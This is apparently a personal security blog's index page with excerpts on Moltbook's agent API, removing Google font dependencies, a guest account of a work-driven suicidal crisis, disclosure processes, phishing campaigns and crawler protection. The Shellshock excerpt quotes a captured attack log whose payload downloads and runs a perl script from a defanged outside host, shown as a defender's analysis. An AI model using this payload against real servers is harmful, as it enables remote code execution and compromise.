Skip to main content

Clawing at credentials

I just wanted to have a look at how Moldbook actually works, especially how agents are supposed to interact, ok? But it was so god damn boring. Now I am instead writing a point-and-laugh blogpost without any value to society. This post ... is quite mean spirited, tbh. I truly dislike this project, given actual energy & metaphorical air it's sucking up for exactly 0 value.

Background

So, how does Moltbook work, from an agents perspective? Thankfully, because the world is an unefficient hellhole, I don't need to wade through some setup bash script here but can just look at a markdown file ( https://www.moltbook.com/skill.md ). Oh neat, warnings about how you shouldn't post the API key anywhere else files away for later.

Note: Maybe thats something their devs should have specific when having a chatbot write this abomination in the first place? https://www.404media.co/exposed-moltbook-database-let-anyone-take-control-of-any-ai-agent-on-the-site/ )

Anyway, lets look at registration... wait, I'd need a Twitter account? Yeah, nah, not gonna happen, I don't frequent Nazi bars.

I wonder if there is services that let you post on a shared account without login?

Fired of a registration anyway to have a look at the response. Hey, neat, thats a very searchable token!

Read more…

Sowwy (Google dependencies)

This blog is built on Nikola & (until now) used the "hack" theme.

While playing with CSPs (why the hell can't I use hashes for CSS files, ffs) I noticed that fonts were getting loaded from google. Yay. Looks like I didn't check the theme in detail because why would you :upsidedown:.

Anyway, fix is fortunately quite easy:

  • Copy & rename theme

  • Download the CSS wrapper from Google & put it in the $theme/assets/css folder

  • Download the font file from Google & put it in $theme/assets/fonts or something

  • Update the themes template to point to the new CSS, update the new CSS to point to the local font, update the config to use the custom theme

I hate this shit - why create external dependencies, user & site trackability, complexity, ... . Just use a default font or ship one with the theme.

That aside: Reason #1280941 to play around with tight CSPs, as if we needed more...

Edit: Other v8 official themes with similar issues, may be incomplete:

  • bnw: Google

  • canterville: Google

  • gruberwine: Google, fontawesome

  • hack: Google

  • hybrid: Google, jsdelivr

  • hyde: Google

  • All zen variants: Google, fontawesome, polyfill

How work sometimes literally tries to kill you

Note by nyanbinary: This post is not by me but a guest contributor, just to avoid any confusion.

Two weeks ago I had a mental breakdown, which lead to me wanting to kill myself seriously enough that my friends strongly urged me to get checked into a stationary psych ward. The process of doing so was annoying stressful and occasionally just deeply stupid but really isn't the point of writing this (tho I would like to thank the work of my friends who tirelessly tried to keep me alive and get me help).

The much more relevant point is: How did I get here? I have had my struggles with suicidal ideation in the past but i had been mostly stable since getting on HRT. The reason for the resurgence is fairly simple (and spoiled by the title): Work.

Read more…

Recursive CVD

About two years ago a few enthusiastic employees in the Security Operations team at $myJob did the right thing: They convinced management that we need a published Coordinated Vulnerability Disclosure (CVD) process (including safe haven for researchers) & a reporting path. They then set out to write the policy, comissioned a pretty basic website, and got everyone other company website to insert a link into the footer. The website, on paper, did everything right: Fully IAC, running on a centrally provided webapp producted managed by our Cloud team. No publicly reachable admin interface, every content change going through our CMS. Explicitly minimalistic. The requirements document was about 60% security requirements, mostly written by experienced pentesters & containing explicit how-tos on, for example, building a proper CSP.

Unfortunately the employees that drove the topic soon after got moved to a very different role, the topic remained with the Vulnerability Management area. Here... enthusiasm & understanding was lacking, so the site kinda... just sat there. The few actual reports that were received were handled without much urgency or care, to be honest, and I can't really fault them, it was a lot of crap for not a lot of gain & they were busy.

When I joined that team I... kinda just stole ownership of the topic because I do care. Things since then haven't been going great: I also am busy/handling too many topics, fixes are often slow, in some cases the business will do its best to just ignore or sit out pretty critical stuff, so many technical issues including us being unable to deploy any changes for months, and a complete lack of documentation making fixing anything hell (currently writing the first actual docs on this, 2 years after release, lol). But things are improving & this is one of the areas where I can truly call mine. Give it another 6 months & I am pretty certain I'll be able to call this "good enough".

What am I going to do in those 6 months? Well, stabilize deployment, iron out smaller technical issues, ... and fix the backlog of security issues that currently exist in the application.

Read more…

We deserve better cybercriminals

One of the benefits of having your own mail server is the access to an inexhaustible pool of addresses & aliases. At some point around 2018 I started to make use of this: Every service I'd sign up for would receive a separate alias. Alias were chosen pseudorandomly, essentially base64-encoded randomness, they were generated in bulk & the list was anotated with the associated service. Over the 7 years ~200 such aliases have been used.

Looking back an improvement I should have made is using email addresses more mimicing real human addresses but :shrug:.

The goal behind this was 2-fold:

  • tracking of (unreported) data leaks & sales

  • easy migration away from publiciced/leaked addresses

I'll be honest... it has been disappointed so far. Even with minimal filtering I have been receiving essentially no spam, no phishing on any of the addresses.

The only exception here is the email I used for Roll20, both during the 2018 and 2024 data breach. For some reason I had not rotated the email between these two so I can't quite match the three groups of phishing emails I received exactly to the specific breach but that should probably be #3 in the "goal" section - matching campaigns to breaches.

Anyway, I want to look at the three clusters for a bit.

Read more…

Ideas for Proof of Work crawler protection

A few ago I wrote a post about Anubis in which I called it kinda crap but fine. Of course my brain didn't shut off after that so, uh, here are some thoughts on how one could solve some of the issues of the proof-of-work approach Anubis uses. I am sure there is prior literature & I am just reinventing the wheel but I wanna see how far I can get on my own (with the design for now, I can't program for shit...).

In the previous blogpost I highlighted the work imbalance by the approach Anubis uses - provide a proof-of-work solution once, get a cookie, do all the requests you want within a multi-day time period. Or in other words: required work does not scale with amount of requests. If you intend to keep the site useable for flesh-and-blood users crawlers don't really pay a high cost either. Unfortunately you can't really limit the amount of calls with one token either (withouth going stateful, ew)... so what if we just required constant proofs instead?

Read more…

Short: Shellshocked!

Just a short one for now: Tonight I received a maximum severity alert from my SIEM, one of my internet-facing webservers received a shellshock attack! After a quick check for successful exploitation (not that I could see) I went back to sleep.

This is what was attempted (except not defanged, duh):

Timestamp: 2025-06-14T01:23:07+0200
Source IP: 104.131.118.62
Action: GET /nagios/cgi-bin/status.cgi HTTP/1.1
User Agent: () { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnZAZAZA\x22';system(\x22wget -O /tmp/gif.gif http[://]pjsn[.]hi2[.]ro/gif.gif;curl -O /tmp/gif.gif http[://]pjsn[.]hi2[.]ro/gif.gif; lwp-download -a http[://]pjsn[.]hi2[.]ro/gif.gif /tmp/gif.gif;perl /tmp/gif.gif;rm -rf /tmp/gif.gif*;exit\x22)

Or in human: Use the useragent to do the (){ :;}; thing, print something in perl I haven't fully made sense of yet, system to download a file (three different ways, depending on what downloader is available), execute the file as a perl script, then clean up behind yourself.

I just want to point out though: I think this is broken in multiple ways?

Read more…

Hotels I won't visit

I recently got my hands on a sample of a phishing campaign. Pretty boring one, fwiw, "just" trying to steal personal + credit card data, but still felt like doing a bit of digging. Here are some findings.

While I will share domains & url patterns I will not share full URLs as the associated pages contain personal data (esp. names) of targets. If you have a need for the full urls feel free to reach out to me.

I will not be able to share the original sample email.

The email

I received my sample email(s) from someone who had recently booked a stay with a specific Austrian Hotel (Hi5-Hotel) through Booking.com. At a later point (2025-06-01) they received a notification from Booking.com about the need to provide additional information, otherwise their stay would be cancelled, with the hotel being named as the sender.

Reviewing the mail itself it looked technically clean, actually coming from a Booking.com subdomain & passing SPF. I will not even include any IOCs for the email itself here as I am rather certain this is, technically, a legitimate email.

The link in the body, however, was highly suspicious: https://hi5XXXX.gstlly.com/ (with XXXX being four random lowercase alphabetic characters). By the time my recipient interacted with that email (2025-06-02) the specific domain had already been flagged as malicious in a security product in use by the recipient, so no damage was done in this case.

Read more…

Do you know where your sponsors are?

tl;dr: I believe that Content Creators have a responsibility for all sponsor claims they make & repeat. If they can not do that they must not advertise outside their area of expertise.

Ads & Waffengleichheit

I do not like advertisement. It wastes my time, it wastes customers money, it is annoying, yada yada yada. Not much new here.

But it also is unfair. The person I first heard this idea from (working in customer retention) saw a fundamental issue in the "Waffengleichheit" (German, lit. "equality of arms"), the idea that on the one side we have professionals using decades to centuries of industry research & the ressources of sometimes multi-billion companies, on the other side some individual just trying to live their life while being under near-constant bombardment by product propaganda.

With this unbelievable asymmetry an individualistic defense is simply not possible. Even if you yourself may consider yourself defended against this propaganda (you aren't!) I believe that society has a duty to defend it's vulnerable, not accept a status in which but the strongest can succeed. As advertisement is not going anywhere anytime soon this means: Controls, limits, and checks are required for advertisement, to at least curb the worst excesses.

Read more…